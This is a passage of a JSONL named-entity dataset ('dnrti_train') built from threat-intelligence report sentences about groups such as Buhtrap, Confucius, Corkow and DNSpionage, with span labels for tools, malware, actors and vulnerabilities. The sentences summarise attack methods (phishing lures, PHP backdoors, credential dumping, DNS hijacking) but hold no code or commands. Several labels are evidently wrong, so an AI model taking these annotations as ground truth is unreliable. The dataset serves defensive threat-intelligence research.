one of the most active financial Trojans .", "spans": {"TOOL: RTM": [[22, 25]]}, "info": {"id": "dnrti_train_001828", "source": "dnrti_train"}} {"text": "At that time it was the name of a cybercriminal group that was stealing money from Russian financial establishments — to the tune of at least $150,000 per hit .", "spans": {"ORGANIZATION: financial establishments": [[91, 115]]}, "info": {"id": "dnrti_train_001829", "source": "dnrti_train"}} {"text": "Buhtrap resurfaced in the beginning of 2017 in the TwoBee campaign , where it served primarily as means of malware delivery .", "spans": {}, "info": {"id": "dnrti_train_001830", "source": "dnrti_train"}} {"text": "After the source codes of their tools became public in 2016 , the name Buhtrap was used for the financial Trojan .", "spans": {"TOOL: financial Trojan": [[96, 112]]}, "info": {"id": "dnrti_train_001831", "source": "dnrti_train"}} {"text": "Just like last time , Buhtrap is spreading through exploits embedded in news outlets .", "spans": {}, "info": {"id": "dnrti_train_001832", "source": "dnrti_train"}} {"text": "Estimating the damages is challenging , but as we learned , the criminals are siphoning off assets in transactions that do not exceed $15,000 each .", "spans": {}, "info": {"id": "dnrti_train_001833", "source": "dnrti_train"}} {"text": "As explained later , we believe this campaign is financially-motivated and that it targets accounting departments in Russian businesses .", "spans": {"ORGANIZATION: accounting departments": [[91, 113]]}, "info": {"id": "dnrti_train_001834", "source": "dnrti_train"}} {"text": "\" Buhgalter \" means \" accountant \" in Russian .", "spans": {}, "info": {"id": "dnrti_train_001835", "source": "dnrti_train"}} {"text": "Seeing a campaign like this , inevitably the Anunak/Carbanak documented by Fox-IT and Kaspersky comes to mind .", "spans": {"TOOL: Anunak/Carbanak": [[45, 60]], "ORGANIZATION: Fox-IT": [[75, 81]], "ORGANIZATION: Kaspersky": [[86, 95]]}, "info": {"id": 
"dnrti_train_001836", "source": "dnrti_train"}} {"text": "The infection vector is similar , it uses a similar modified mimikatz application , and it uses a third-party remote access tool , changes system settings to allow concurrent RDP sessions , and so on .", "spans": {"TOOL: mimikatz": [[61, 69]], "TOOL: third-party remote access tool": [[98, 128]], "TOOL: RDP": [[175, 178]]}, "info": {"id": "dnrti_train_001837", "source": "dnrti_train"}} {"text": "The second , aptly titled \" kontrakt87.doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator .", "spans": {"MALWARE: kontrakt87.doc": [[28, 42]], "ORGANIZATION: MegaFon": [[105, 112]], "ORGANIZATION: mobile phone operator": [[131, 152]]}, "info": {"id": "dnrti_train_001838", "source": "dnrti_train"}} {"text": "Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website .", "spans": {"MALWARE: Careto": [[0, 6]]}, "info": {"id": "dnrti_train_001840", "source": "dnrti_train"}} {"text": "Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate .", "spans": {"TOOL: sub-domains": [[30, 41]]}, "info": {"id": "dnrti_train_001841", "source": "dnrti_train"}} {"text": "These sub-domains simulate sub-sections of the main newspapers in Spain plus some international ones like the Guardian and the Washington Post .", "spans": {"ORGANIZATION: Washington Post": [[127, 142]]}, "info": {"id": "dnrti_train_001842", "source": "dnrti_train"}} {"text": "The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story .", "spans": {"VULNERABILITY: CVE-2012-0773": [[4, 17]]}, "info": {"id": "dnrti_train_001843", "source": "dnrti_train"}} {"text": "In other words , the attackers attracted our attention by attempting to exploit Kaspersky Lab products .", "spans": {"TOOL: Kaspersky Lab products": [[80, 102]]}, "info": {"id": "dnrti_train_001844", "source": "dnrti_train"}} 
{"text": "We initially became aware of Careto when we observed attempts to exploit a vulnerability in our products to make the malware \" invisible \" in the system .", "spans": {"MALWARE: Careto": [[29, 35]]}, "info": {"id": "dnrti_train_001845", "source": "dnrti_train"}} {"text": "Most modules were created in 2012 .", "spans": {}, "info": {"id": "dnrti_train_001846", "source": "dnrti_train"}} {"text": "The attackers began taking them offline in January 2014 .", "spans": {}, "info": {"id": "dnrti_train_001847", "source": "dnrti_train"}} {"text": "Last week we discussed Numbered Panda , a group that is also based out of China and is fairly well known to the security community , though by many names .", "spans": {"THREAT_ACTOR: Numbered Panda": [[23, 37]], "ORGANIZATION: security community": [[112, 130]]}, "info": {"id": "dnrti_train_001848", "source": "dnrti_train"}} {"text": "We revealed a Chinese-based adversary we crypt as Anchor Panda , a group with very specific tactics , techniques , and procedures ( TTPs ) and a keen interest in maritime operations and naval and aerospace technology .", "spans": {"THREAT_ACTOR: Anchor Panda": [[50, 62]]}, "info": {"id": "dnrti_train_001849", "source": "dnrti_train"}} {"text": "The campaign was active until January 2014 , but during our investigations the C&C servers were shut down .", "spans": {}, "info": {"id": "dnrti_train_001850", "source": "dnrti_train"}} {"text": "This week we are going to discuss Clever Kitten , whom , by virtue of several indicators , we have affiliated with the Islamic Republic of Iran .", "spans": {}, "info": {"id": "dnrti_train_001851", "source": "dnrti_train"}} {"text": "Clever Kitten has moved to leveraging strategic web compromises .", "spans": {"THREAT_ACTOR: Clever Kitten": [[0, 13]]}, "info": {"id": "dnrti_train_001852", "source": "dnrti_train"}} {"text": "Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted 
attackers who often favor targeting a specific individual at a specific organization using social engineering .", "spans": {"THREAT_ACTOR: Clever Kitten": [[0, 13]], "ORGANIZATION: individual": [[179, 189]]}, "info": {"id": "dnrti_train_001853", "source": "dnrti_train"}} {"text": "Clever Kitten primarily targets global companies with strategic importance to countries that are contrary to Iranian interests .", "spans": {"THREAT_ACTOR: Clever Kitten": [[0, 13]]}, "info": {"id": "dnrti_train_001854", "source": "dnrti_train"}} {"text": "A Clever Kitten attack starts with the use of a web vulnerability scanner to conduct reconnaissance .", "spans": {"THREAT_ACTOR: Clever Kitten": [[2, 15]], "TOOL: web vulnerability scanner": [[48, 73]]}, "info": {"id": "dnrti_train_001855", "source": "dnrti_train"}} {"text": "The scanner was identified as the Acunetix Web Vulnerability Scanner which is a commercial penetration testing tool that is readily available as a 14-day trial .", "spans": {"MALWARE: Acunetix Web Vulnerability Scanner": [[34, 68]]}, "info": {"id": "dnrti_train_001856", "source": "dnrti_train"}} {"text": "Once an exploitable page is identified , Clever Kitten will attempt to upload a PHP backdoor to gain remote access to the system .", "spans": {}, "info": {"id": "dnrti_train_001857", "source": "dnrti_train"}} {"text": "The reason for this is likely the availability of exploits against web browsers , which for a variety of reasons allows an attacker to bypass security features such as Data Execution Prevention ( DEP ) or Address Space Layout Randomization ( ASLR ) .", "spans": {}, "info": {"id": "dnrti_train_001858", "source": "dnrti_train"}} {"text": "Once an exploitable page is identified , the actor will attempt to upload a PHP backdoor to gain remote access to the system .", "spans": {}, "info": {"id": "dnrti_train_001859", "source": "dnrti_train"}} {"text": "In Clever Kitten 's attacks , the goal is lateral movement ; this is an attempt to move further into 
the target environment in order to begin intelligence collection .", "spans": {}, "info": {"id": "dnrti_train_001860", "source": "dnrti_train"}} {"text": "This activity is a longer tail for the actor than a spearphish ; this is likely based on the Clever Kitten background , which may be focused on web development/application testing .", "spans": {}, "info": {"id": "dnrti_train_001861", "source": "dnrti_train"}} {"text": "Without going too deep into the rabbit hole , there are several indicators pointing to an Iranian nexus , including language artifacts in the tool-marks used by the attacker , as well as network activity tying this actor to a very specific location that we have high confidence in not being spoofed .", "spans": {}, "info": {"id": "dnrti_train_001862", "source": "dnrti_train"}} {"text": "Clever Kitten 's goal is to eventually be able to masquerade as a legitimate user by compromising credentials either through a pass-the-hash attack , or by dumping password hashes from a compromised host .", "spans": {"THREAT_ACTOR: Clever Kitten": [[0, 13]]}, "info": {"id": "dnrti_train_001863", "source": "dnrti_train"}} {"text": "The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries are also targeted .", "spans": {"ORGANIZATION: Arab": [[86, 90]], "ORGANIZATION: Emirates": [[91, 99]]}, "info": {"id": "dnrti_train_001864", "source": "dnrti_train"}} {"text": "There are new TTPs used in this attack – for example Agent_Drable is leveraging the Django python framework for command and control infrastructure , the technical details of which are outlined later in the blog .", "spans": {"TOOL: Django": [[84, 90]]}, "info": {"id": "dnrti_train_001865", "source": "dnrti_train"}} {"text": "n summary , Cold River is a sophisticated threat actor making malicious use of DNS tunneling for command and control activities , compelling lure documents 
, and previously unknown implants .", "spans": {"TOOL: DNS tunneling": [[79, 92]]}, "info": {"id": "dnrti_train_001866", "source": "dnrti_train"}} {"text": "Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor .", "spans": {"ORGANIZATION: Linux computers": [[93, 108]]}, "info": {"id": "dnrti_train_001867", "source": "dnrti_train"}} {"text": "The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries may have also been targeted .", "spans": {"ORGANIZATION: Arab Emirates": [[86, 99]]}, "info": {"id": "dnrti_train_001868", "source": "dnrti_train"}} {"text": "The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated .", "spans": {"TOOL: decoy documents": [[4, 19]], "VULNERABILITY: InPage exploits": [[32, 47]]}, "info": {"id": "dnrti_train_001869", "source": "dnrti_train"}} {"text": "The use of InPage as an attack vector is not commonly seen , with the only previously noted attacks being documented by Kaspersky in late 2016 .", "spans": {"TOOL: InPage": [[11, 17]], "ORGANIZATION: Kaspersky": [[120, 129]]}, "info": {"id": "dnrti_train_001870", "source": "dnrti_train"}} {"text": "The decoy documents dropped suggest that the targets are likely to be politically or militarily motivated , with subjects such as Intelligence reports and political situations being used as lure documents .", "spans": {"MALWARE: decoy documents": [[4, 19]]}, "info": {"id": "dnrti_train_001871", "source": "dnrti_train"}} {"text": "While documents designed to exploit the InPage software are rare , they are not new – however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky .", "spans": 
{"TOOL: InPage software": [[40, 55]], "ORGANIZATION: Unit42": [[110, 116]], "VULNERABILITY: InPage exploits": [[139, 154]], "ORGANIZATION: Kaspersky": [[250, 259]]}, "info": {"id": "dnrti_train_001872", "source": "dnrti_train"}} {"text": "Confucius targeted a particular set of individuals in South Asian countries , such as military personnel and businessmen , among others .", "spans": {"ORGANIZATION: military personnel": [[86, 104]], "ORGANIZATION: businessmen": [[109, 120]]}, "info": {"id": "dnrti_train_001873", "source": "dnrti_train"}} {"text": "Tweety Chat 's Android version can record audio , too .", "spans": {"TOOL: Tweety Chat": [[0, 11]]}, "info": {"id": "dnrti_train_001874", "source": "dnrti_train"}} {"text": "Confucius' operations include deploying bespoke backdoors and stealing files from their victim 's systems with tailored file stealers , some of which bore resemblances to Patchwork 's .", "spans": {"THREAT_ACTOR: Patchwork": [[171, 180]]}, "info": {"id": "dnrti_train_001875", "source": "dnrti_train"}} {"text": "Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": {"THREAT_ACTOR: Patchwork": [[12, 21]], "VULNERABILITY: CVE-2015-1641": [[191, 204]], "VULNERABILITY: CVE-2017-11882": [[209, 223]]}, "info": {"id": "dnrti_train_001876", "source": "dnrti_train"}} {"text": "Back in February , we noted the similarities between the Patchwork and Confucius groups and found that , in addition to the similarities in their malware code , both groups primarily went after targets in South Asia .", "spans": {"THREAT_ACTOR: Patchwork": [[57, 66]], "THREAT_ACTOR: Confucius groups": [[71, 87]]}, "info": {"id": "dnrti_train_001877", "source": "dnrti_train"}} {"text": "Back in February , Trend Micro noted the similarities between the Patchwork and Confucius groups and found that , in 
addition to the similarities in their malware code , both groups primarily went after targets in South Asia .", "spans": {"ORGANIZATION: Trend Micro": [[19, 30]], "THREAT_ACTOR: Patchwork": [[66, 75]], "THREAT_ACTOR: Confucius groups": [[80, 96]]}, "info": {"id": "dnrti_train_001878", "source": "dnrti_train"}} {"text": "One of its file stealers , swissknife2 , abuses a cloud storage service as a repository of exfiltrated files .", "spans": {"TOOL: swissknife2": [[27, 38]]}, "info": {"id": "dnrti_train_001879", "source": "dnrti_train"}} {"text": "During the months that followed in which we tracked Confucius' activities , we found that they were still aiming for Pakistani targets .", "spans": {}, "info": {"id": "dnrti_train_001880", "source": "dnrti_train"}} {"text": "During their previous campaign , we found Confucius using fake romance websites to entice victims into installing malicious Android applications .", "spans": {}, "info": {"id": "dnrti_train_001881", "source": "dnrti_train"}} {"text": "Periodically , the malware tries to contact the Command-and-Control ( C&C ) server with the username encoded into parameters .", "spans": {"TOOL: Command-and-Control": [[48, 67]]}, "info": {"id": "dnrti_train_001882", "source": "dnrti_train"}} {"text": "This function is similar to the various versions of backdoors ( such as sctrls and sip_telephone ) that we analyzed in our previous blog post and whitepaper .", "spans": {"TOOL: sctrls": [[72, 78]], "TOOL: sip_telephone": [[83, 96]]}, "info": {"id": "dnrti_train_001883", "source": "dnrti_train"}} {"text": "This algorithm was previously discussed by security researchers in a Confucius-related blog post .", "spans": {}, "info": {"id": "dnrti_train_001884", "source": "dnrti_train"}} {"text": "The group still uses the Badnews malware , a backdoor with information-stealing and file-executing capabilities , albeit updated with a slight modification in the encryption routine at the end of 2017 , when they added Blowfish encryption 
on top of their custom encryption described in our former Patchwork blogpost .", "spans": {"TOOL: Badnews malware": [[25, 40]], "THREAT_ACTOR: Patchwork": [[297, 306]]}, "info": {"id": "dnrti_train_001886", "source": "dnrti_train"}} {"text": "Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions — which are often not designed to handle the persistent and sophisticated threats detailed in this blog — ineffective .", "spans": {"THREAT_ACTOR: Confucius": [[19, 28]], "THREAT_ACTOR: Patchwork": [[33, 42]]}, "info": {"id": "dnrti_train_001887", "source": "dnrti_train"}} {"text": "The reality is that IT departments of small to large-sized organizations are not equipped to handle the more advanced threats that groups like Confucius use in their attacks .", "spans": {"ORGANIZATION: IT departments": [[20, 34]]}, "info": {"id": "dnrti_train_001888", "source": "dnrti_train"}} {"text": "Patchwork uses email as an entry point , which is why securing the email gateway is important .", "spans": {"THREAT_ACTOR: Patchwork": [[0, 9]]}, "info": {"id": "dnrti_train_001889", "source": "dnrti_train"}} {"text": "This blog post examines two similar malware families that utilize the aforementioned technique to abuse legitimate websites , their connections to each other , and their connections to known espionage campaigns .", "spans": {}, "info": {"id": "dnrti_train_001890", "source": "dnrti_train"}} {"text": "In order to increase the likelihood of their malware successfully communicating home , cyber espionage threat actors are increasingly abusing legitimate web services , in lieu of DNS lookups to retrieve a command and control address .", "spans": {}, "info": {"id": "dnrti_train_001891", "source": "dnrti_train"}} {"text": "In 2013 , Rapid7 reported on a series of relatively amateur attacks against Pakistani targets .", "spans": {"ORGANIZATION: Rapid7": [[10, 16]]}, "info": {"id": 
"dnrti_train_001892", "source": "dnrti_train"}} {"text": "The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 .", "spans": {"MALWARE: CONFUCIUS_A": [[29, 40]], "TOOL: SNEEPY": [[159, 165]], "TOOL: ByeByeShell": [[172, 183]], "ORGANIZATION: Rapid7": [[204, 210]]}, "info": {"id": "dnrti_train_001893", "source": "dnrti_train"}} {"text": "At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files .", "spans": {"MALWARE: CONFUCIUS_B": [[16, 27]], "MALWARE: CONFUCIUS_A": [[50, 61]], "TOOL: SFX binary files": [[100, 116]]}, "info": {"id": "dnrti_train_001894", "source": "dnrti_train"}} {"text": "We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover .", "spans": {"TOOL: SNEEPY/BYEBYESHELL": [[147, 165]], "MALWARE: CONFUCIUS_B": [[174, 185]], "TOOL: Hangover": [[207, 215]]}, "info": {"id": "dnrti_train_001896", "source": "dnrti_train"}} {"text": "The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B .", "spans": {"ORGANIZATION: development company": [[153, 172]], "MALWARE: CONFUCIUS_A": [[187, 198]], "MALWARE: CONFUCIUS_B": [[203, 214]]}, "info": {"id": "dnrti_train_001897", "source": "dnrti_train"}} {"text": "In this blog post , we discussed two separate malware variations that behave in very similar ways and use similar techniques to acquire a C2 address , with both using Yahoo Answers and Quora to evade traditional mechanisms for blocking command and control domains .", "spans": {}, "info": {"id": "dnrti_train_001898", "source": 
"dnrti_train"}} {"text": "Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": {"TOOL: Confucius'": [[0, 10]], "VULNERABILITY: CVE-2015-1641": [[105, 118]], "VULNERABILITY: CVE-2017-11882": [[123, 137]]}, "info": {"id": "dnrti_train_001900", "source": "dnrti_train"}} {"text": "We dove deeper into Confucius' operations—namely , the malware-ridden documents , backdoors , and file stealers they use in their campaigns .", "spans": {}, "info": {"id": "dnrti_train_001901", "source": "dnrti_train"}} {"text": "The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 .", "spans": {"TOOL: sctrls backdoor": [[4, 19]], "VULNERABILITY: CVE-2015-1641": [[73, 86]]}, "info": {"id": "dnrti_train_001902", "source": "dnrti_train"}} {"text": "In August 2015 a new incident related to the Corkow ( Metel ) Trojan was detected .", "spans": {"TOOL: Corkow": [[45, 51]], "THREAT_ACTOR: Metel": [[54, 59]]}, "info": {"id": "dnrti_train_001904", "source": "dnrti_train"}} {"text": "Corkow provided remote access to the ITS-Broker system terminal by 《 Platforma soft 》 Ltd , which enabled the fraud to be committed .", "spans": {"TOOL: Corkow": [[0, 6]]}, "info": {"id": "dnrti_train_001905", "source": "dnrti_train"}} {"text": "According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list .", "spans": {"MALWARE: botnet encompassed": [[63, 81]], "ORGANIZATION: financial institutions": [[156, 178]]}, "info": {"id": "dnrti_train_001906", "source": "dnrti_train"}} {"text": "The interest among hackers in targeting trading systems is expected to grow .", "spans": {}, "info": {"id": "dnrti_train_001907", "source": "dnrti_train"}} {"text": "Russian-speaking hackers are believed to be responsible for these attacks and used the 
Corkow Trojan .", "spans": {"TOOL: Corkow Trojan": [[87, 100]]}, "info": {"id": "dnrti_train_001908", "source": "dnrti_train"}} {"text": "Hackers target primarily companies in Russia and CIS countries , though it is noticed that the amount of attacks targeting the USA has increased 5 times since 2011 .", "spans": {"ORGANIZATION: primarily companies": [[15, 34]]}, "info": {"id": "dnrti_train_001909", "source": "dnrti_train"}} {"text": "One of the first botnets specializing in targeting the trading software called Quik was \" Ranbyus \" , created in 2012 .", "spans": {"TOOL: Quik": [[79, 83]], "TOOL: Ranbyus": [[90, 97]]}, "info": {"id": "dnrti_train_001910", "source": "dnrti_train"}} {"text": "As of the Group-IB investigation of this malware program in March 2015 , Corkow v.7.118.1.1 had not been detected by a single antivirus program .", "spans": {"ORGANIZATION: Group-IB": [[10, 18]], "TOOL: Corkow": [[73, 79]]}, "info": {"id": "dnrti_train_001911", "source": "dnrti_train"}} {"text": "Hackers gained access to a computer in the trading system in September 2014 .", "spans": {}, "info": {"id": "dnrti_train_001912", "source": "dnrti_train"}} {"text": "Starting in December 2014 , the criminal group began running keyloggers in the infected system .", "spans": {"TOOL: keyloggers": [[61, 71]]}, "info": {"id": "dnrti_train_001913", "source": "dnrti_train"}} {"text": "To spread the Corkow malware criminals use a drive-by downloads method , when victims are infected while visiting compromised legitimate websites .", "spans": {}, "info": {"id": "dnrti_train_001914", "source": "dnrti_train"}} {"text": "Group-IB specialists detected various sites used by criminals to spread the Trojan : mail tracking websites , news portals , electronic books , computer graphics resources , music portals , etc .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "TOOL: mail tracking websites": [[85, 107]], "TOOL: news portals": [[110, 122]], "TOOL: electronic books": [[125, 141]], "TOOL: computer 
graphics resources": [[144, 171]], "TOOL: music portals": [[174, 187]]}, "info": {"id": "dnrti_train_001915", "source": "dnrti_train"}} {"text": "Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users .", "spans": {"VULNERABILITY: Nitris Exploit Kit": [[27, 45]], "VULNERABILITY: CottonCastle": [[67, 79]]}, "info": {"id": "dnrti_train_001916", "source": "dnrti_train"}} {"text": "Group-IB Bot-trek TDS sensors are in place at a number of financial institutions and , unfortunately , we register that currently Corkow malware is present on 80% of protected corporate systems .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "ORGANIZATION: financial institutions": [[58, 80]], "TOOL: Corkow malware": [[130, 144]]}, "info": {"id": "dnrti_train_001917", "source": "dnrti_train"}} {"text": "Considering the Trojan delivery method and through our analysis of infections on banks' networks , we can confirm that all infections were conducted on a random basis .", "spans": {}, "info": {"id": "dnrti_train_001918", "source": "dnrti_train"}} {"text": "According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 .", "spans": {"TOOL: Corkow": [[26, 32]], "ORGANIZATION: users": [[51, 56]]}, "info": {"id": "dnrti_train_001919", "source": "dnrti_train"}} {"text": "Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries .", "spans": {"TOOL: Corkow": [[25, 31]]}, "info": {"id": "dnrti_train_001920", "source": "dnrti_train"}} {"text": "Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance .", "spans": {"VULNERABILITY: 
Niteris exploit": [[45, 60]]}, "info": {"id": "dnrti_train_001922", "source": "dnrti_train"}} {"text": "In addition to the legitimate AmmyAdmin tool , the hackers used Visconti Backdoor developed based on legitimate RMS ( remote manipulator system ) software .", "spans": {"TOOL: AmmyAdmin tool": [[30, 44]], "TOOL: Visconti Backdoor": [[64, 81]], "TOOL: RMS": [[112, 115]]}, "info": {"id": "dnrti_train_001923", "source": "dnrti_train"}} {"text": "To obtain logins and passwords they applied keyloggers built into Corkow , as well as a commonly used feature of Mimikatz , dumping clear text Windows credentials from LSA .", "spans": {"TOOL: keyloggers": [[44, 54]], "TOOL: Corkow": [[66, 72]]}, "info": {"id": "dnrti_train_001925", "source": "dnrti_train"}} {"text": "Hackers used the remote access to detect servers of their interest in the internal network .", "spans": {}, "info": {"id": "dnrti_train_001926", "source": "dnrti_train"}} {"text": "In 2015 , the Metel gang began to target banks and financial institutions directly .", "spans": {"ORGANIZATION: financial institutions": [[51, 73]]}, "info": {"id": "dnrti_train_001927", "source": "dnrti_train"}} {"text": "Metel is a banking Trojan ( also known as Corkow ) discovered in 2011 when it was used to attack users of online banking services .", "spans": {"TOOL: Metel": [[0, 5]], "TOOL: banking Trojan": [[11, 25]], "THREAT_ACTOR: Corkow": [[42, 48]]}, "info": {"id": "dnrti_train_001928", "source": "dnrti_train"}} {"text": "After the infection stage , criminals move laterally with the help of legitimate and pentesting tools , stealing passwords from their initial victims ( entry point ) to gain access to the computers within the organization that have access to money transactions .", "spans": {}, "info": {"id": "dnrti_train_001929", "source": "dnrti_train"}} {"text": "With this level of access , the gang has been able to pull off a clever trick by automating the rollback of ATM transactions .", "spans": {}, "info": {"id": 
"dnrti_train_001930", "source": "dnrti_train"}} {"text": "COVELLITE operates globally with targets primarily in Europe , East Asia , and North America .", "spans": {}, "info": {"id": "dnrti_train_001931", "source": "dnrti_train"}} {"text": "US targets emerged in September 2017 with a small , targeted phishing campaign directed at select U.S. electric companies .", "spans": {"ORGANIZATION: electric companies": [[103, 121]]}, "info": {"id": "dnrti_train_001932", "source": "dnrti_train"}} {"text": "LAZARUS GROUP is responsible for attacks ranging from the 2014 attack on Sony Pictures to a number of Bitcoin heists in 2017 .", "spans": {"ORGANIZATION: Sony Pictures": [[73, 86]]}, "info": {"id": "dnrti_train_001933", "source": "dnrti_train"}} {"text": "Technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits .", "spans": {"TOOL: COVELLITE malware": [[22, 39]], "TOOL: LAZARUS toolkits": [[74, 90]]}, "info": {"id": "dnrti_train_001934", "source": "dnrti_train"}} {"text": "COVELLITE remains active but appears to have abandoned North American targets , with indications of activity in Europe and East Asia .", "spans": {}, "info": {"id": "dnrti_train_001935", "source": "dnrti_train"}} {"text": "Given the group 's specific interest in infrastructure operations , rapidly improving capabilities , and history of aggressive targeting , Dragos considers this group a primary threat to the ICS industry .", "spans": {"ORGANIZATION: Dragos": [[139, 145]]}, "info": {"id": "dnrti_train_001936", "source": "dnrti_train"}} {"text": "Delivering a backdoor and spyware , this campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video .", "spans": {}, "info": {"id": "dnrti_train_001937", "source": "dnrti_train"}} {"text": "Delivering a backdoor and spyware , Desert Falcons 's campaign was 
designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video .", "spans": {}, "info": {"id": "dnrti_train_001940", "source": "dnrti_train"}} {"text": "FrozenCell is the mobile component of a multi-platform attack we've seen a threat actor known as \" Two-tailed Scorpion/APT-C-23 \" , use to spy on victims through compromised mobile devices and desktops .", "spans": {"TOOL: FrozenCell": [[0, 10]], "THREAT_ACTOR: Scorpion/APT-C-23": [[110, 127]]}, "info": {"id": "dnrti_train_001941", "source": "dnrti_train"}} {"text": "Desert Falcons is keenly aware of the information they can derive from these devices and are using multi-stage ( phishing + an executable ) , multi-platform ( Android + desktop ) attacks to accomplish their spying .", "spans": {"THREAT_ACTOR: Desert Falcons": [[0, 14]]}, "info": {"id": "dnrti_train_001943", "source": "dnrti_train"}} {"text": "FrozenCell masquerades as fake updates to chat applications like Facebook , WhatsApp , Messenger , LINE , and LoveChat .", "spans": {"TOOL: FrozenCell masquerades": [[0, 22]], "ORGANIZATION: Facebook": [[65, 73]], "ORGANIZATION: WhatsApp": [[76, 84]], "ORGANIZATION: Messenger": [[87, 96]], "ORGANIZATION: LINE": [[99, 103]], "ORGANIZATION: LoveChat": [[110, 118]]}, "info": {"id": "dnrti_train_001944", "source": "dnrti_train"}} {"text": "It appears the Desert Falcons sent malicious executables though phishing campaigns impersonating individuals associated with the Palestinian Security Services , the General Directorate of Civil Defence - Ministry of the Interior , and the 7th Fateh Conference of the Palestinian National Liberation Front ( held in late 2016 ) .", "spans": {"THREAT_ACTOR: Desert Falcons": [[15, 29]], "ORGANIZATION: National Liberation Front": [[279, 304]]}, "info": {"id": "dnrti_train_001946", "source": "dnrti_train"}} {"text": "We believe that 
this is a new variant of VAMP , indicating that the threat actors behind APT-C-23 are still active and continuously improving their product .", "spans": {"TOOL: VAMP": [[41, 45]], "THREAT_ACTOR: APT-C-23": [[89, 97]]}, "info": {"id": "dnrti_train_001948", "source": "dnrti_train"}} {"text": "VAMP targeted various types of data from the phones of victims : images , text messages , contacts , and call history , among others .", "spans": {"TOOL: VAMP": [[0, 4]]}, "info": {"id": "dnrti_train_001949", "source": "dnrti_train"}} {"text": "Recently , Trend Micro researchers came across a new mobile malware family which we have called GnatSpy .", "spans": {"ORGANIZATION: Trend Micro": [[11, 22]], "TOOL: GnatSpy": [[96, 103]]}, "info": {"id": "dnrti_train_001950", "source": "dnrti_train"}} {"text": "On Nov. 27 , 2018 , Cisco 's Talos research division published a write-up outlining the contours of a sophisticated cyber espionage campaign it dubbed DNSpionage .", "spans": {"ORGANIZATION: Cisco 's Talos": [[20, 34]]}, "info": {"id": "dnrti_train_001951", "source": "dnrti_train"}} {"text": "Talos said the perpetrators of DNSpionage were able to steal email and other login credentials from a number of government and private sector entities in Lebanon and the United Arab Emirates by hijacking the DNS servers for these targets , so that all email and virtual private networking ( VPN ) traffic was redirected to an Internet address controlled by the attackers .", "spans": {"ORGANIZATION: Talos": [[0, 5]], "TOOL: VPN": [[291, 294]]}, "info": {"id": "dnrti_train_001952", "source": "dnrti_train"}} {"text": "Talos reported that these DNS hijacks also paved the way for the attackers to obtain SSL encryption certificates for the targeted domains ( e.g.webmail.finance.gov.lb ) , which allowed them to decrypt the intercepted email and VPN credentials and view them in plain text .", "spans": {"ORGANIZATION: Talos": [[0, 5]]}, "info": {"id": "dnrti_train_001953", "source": "dnrti_train"}} 
{"text": "That changed on Jan. 25 , 2019 , when security firm CrowdStrike published a blog post listing virtually every Internet address known to be ( ab )used by the espionage campaign to date .", "spans": {"ORGANIZATION: security firm": [[38, 51]], "ORGANIZATION: CrowdStrike": [[52, 63]]}, "info": {"id": "dnrti_train_001954", "source": "dnrti_train"}} {"text": "Working backwards from each Internet address , I was able to see that in the last few months of 2018 the hackers behind DNSpionage succeeded in compromising key components of DNS infrastructure for more than 50 Middle Eastern companies and government agencies , including targets in Albania , Cyprus , Egypt , Iraq , Jordan , Kuwait , Lebanon , Libya , Saudi Arabia and the United Arab Emirates .", "spans": {"ORGANIZATION: companies": [[226, 235]], "ORGANIZATION: government agencies": [[240, 259]]}, "info": {"id": "dnrti_train_001955", "source": "dnrti_train"}} {"text": "PCH is a nonprofit entity based in northern California that also manages significant amounts of the world 's DNS infrastructure , particularly the DNS for more than 500 top-level domains and a number of the Middle East top-level domains targeted by DNSpionage .", "spans": {}, "info": {"id": "dnrti_train_001956", "source": "dnrti_train"}} {"text": "This APT group usually carries out target attacks against government agencies to steal sensitive information .", "spans": {"ORGANIZATION: government agencies": [[58, 77]]}, "info": {"id": "dnrti_train_001957", "source": "dnrti_train"}} {"text": "In addition to spreading malware via spear fishing email with Office attachment containing either vulnerability or malicious macro , this group is particularly good at leveraging malicious Android APKs in the target attacks .", 